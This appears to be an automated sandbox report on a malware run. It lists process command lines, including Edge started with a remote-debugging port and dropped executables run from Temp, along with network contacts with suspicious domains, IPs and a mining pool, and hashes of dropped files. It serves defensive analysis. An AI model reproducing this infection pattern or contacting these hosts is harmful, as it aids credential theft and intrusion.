"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2896 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4664 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2420 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3652 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5072 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3924 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe292346f8,0x7ffe29234708,0x7ffe29234718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 80.240.16.67:443 | pool.hashvault.pro | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| GB | 104.86.110.200:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| NL | 45.154.98.175:6969 | | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta
| MD5 | 24164c55359cb2be793b9f597bc5514b |
| SHA1 | 54dfb3694a5501202fc920de6994f55f69cc5e95 |
| SHA256 | 70e92da33fb6877c1a07b51f1032d5251d4507c40d2682c734da363c18692b11 |
| SHA512 | c2093826d4e38803e79fc61bfd1fdc408a05b98cf9e17e4b890a9e44a7cd2d07a9d3b67d454ebe682ae2db597ff423f4f3e3cc8f8476524c184231d1c80860d8 |
memory/4824-2-0x0000000004880000-0x00000000048B6000-memory.dmp
memory/4824-3-0x00000000050A0000-0x00000000056C8000-memory.dmp
memory/4824-4-0x0000000004FA0000-0x0000000004FC2000-memory.dmp
memory/4824-5-0x0000000005740000-0x00000000057A6000-memory.dmp
memory/4824-6-0x0000000005820000-0x0000000005886000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjyrybys.5av.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4824-16-0x0000000005990000-0x0000000005CE4000-memory.dmp
memory/4824-17-0x0000000005E10000-0x0000000005E2E000-memory.dmp
memory/4824-18-0x0000000005EC0000-0x0000000005F0C000-memory.dmp
memory/4824-19-0x0000000007550000-0x0000000007BCA000-memory.dmp
memory/4824-20-0x0000000006340000-0x000000000635A000-memory.dmp
memory/4824-22-0x00000000072F0000-0x0000000007386000-memory.dmp
memory/4824-23-0x0000000007250000-0x0000000007272000-memory.dmp
memory/4824-24-0x0000000008180000-0x0000000008724000-memory.dmp
C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE
| MD5 | b5db83c03a37b4cd4746a6080133e338 |
| SHA1 | edf3f7e5c3bda89e1382df8f7d0443783426c834 |
| SHA256 | 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df |
| SHA512 | e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313 |
memory/2352-32-0x0000000000A60000-0x0000000000F1F000-memory.dmp
memory/628-48-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/2352-46-0x0000000000A60000-0x0000000000F1F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/628-63-0x0000000000E90000-0x000000000134F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
C:\Users\Admin\AppData\Local\Temp\162.tmp\163.tmp\164.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/3272-89-0x000001F3F8CF0000-0x000001F3F8D12000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b6d1564f25c6e55a3521e32f14b9359e |
| SHA1 | f235ae0cf8b7dc38f0ba62f5af709db39721cfbb |
| SHA256 | 2d2e88eb22c7cbb32e7fab4b7ed51742f597b05b0a60796e8f2c3129952627c7 |
| SHA512 | b8ee3d1c7614afd16e3a653ec2433ccfa8f4c01600207b54040f32fb29ad670488c5988ed4430157496f2ccc29c2b1036491bddc707a531b185b65542b2d3d41 |
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/1572-104-0x0000000000D10000-0x00000000011AB000-memory.dmp
memory/628-106-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/2848-108-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/2848-109-0x0000000000E90000-0x000000000134F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/2788-127-0x0000000000D30000-0x0000000000DA0000-memory.dmp
memory/1304-131-0x0000000003910000-0x0000000003915000-memory.dmp
memory/1304-132-0x0000000003910000-0x0000000003915000-memory.dmp
memory/2116-138-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2116-140-0x0000000000400000-0x0000000000466000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fb69a897da24ac74c2ae90ff3fc2ca23 |
| SHA1 | c682a0366ecd6631cad01cfe8f10e198da9a3e9a |
| SHA256 | 8ec36cc1e4ec619067e4781269afd4a68ba2490fb859eded484b731723c15661 |
| SHA512 | d2ee9b6843c726bc3c9ca807214177f1109f8354a4ed83e3f9577ebc223f260a5a6f7bbe71630f9b98c9f585fe7e6a216204aa7aa952967f4e0f59bd47fe599a |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
memory/1572-157-0x0000000000D10000-0x00000000011AB000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.cmdline
| MD5 | 00af5cb02e668eb208955d27c78d5541 |
| SHA1 | b86d0c24270ad2ac53c218c81575a39993fd4115 |
| SHA256 | d0e307dc7c64bb735cb924b381884df95cd500ee848a4451bdd30cf60e67f9d6 |
| SHA512 | c1b6b4b96616a7bbe2742583d9b3205cea5e27a105dd19578301e47085ee84c56db035f25841e1f49c6e790be059c20c41c423a6049c0e873ec462192f38d9c8 |
\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\CSC1D221A13830145B39B7013BD391E7E61.TMP
| MD5 | 7a7a4742cd355e964950d101ec2936fb |
| SHA1 | 81ac58d0f392c05616b7467260816a89f134aa7d |
| SHA256 | 0a6e1104c5cfad76194663187363df38fda97b83837f89885e62d2e3623e0b86 |
| SHA512 | 1b3ad66412a64363c2696843c42943da95a2c281bc23ef7623c58a6b2779ecd0ad83f86ba1fc7594458a7f300e48a3f3c93659c037290aa6aeb2192ca530961d |
C:\Users\Admin\AppData\Local\Temp\RES35B1.tmp
| MD5 | f81b6fc29eed33b7f9a66137a68bf76b |
| SHA1 | 9dfd8435032016ec6e053d507c973047905f504c |
| SHA256 | 93e2cd8bd1bbcff820e381b553568c18afc0902f4998a72abf42fcd0cd41f580 |
| SHA512 | ff8d588bb1ae8ef21444c537ebdefe616b877f04a38bcb331c8d08f57f6bbbf090781cf8557b08777982b933f43bb0728eabe4c54bd71e27eaa8de0876e8defe |
C:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.dll
| MD5 | 7e2efb8916dc921e3aac19040933b9a0 |
| SHA1 | 72bc068c9220fe66038db6c85a9e61ff2030dee9 |
| SHA256 | 45ccd91e10d1e4748208bac7e0270e813ef7f2c0bf5d5f6c028ba484da1b2fba |
| SHA512 | 1c7cb1c02f7255403ad2b781a3814dcd44d4c4bf86bebfc868d520a627da34c3eb98048ca47d83326290f5fcdebb9ca17bdf5aed2117486e8d0928c1787cb405 |
memory/4940-170-0x0000022CC9570000-0x0000022CC9578000-memory.dmp
memory/3404-172-0x000000000D0B0000-0x000000000D933000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
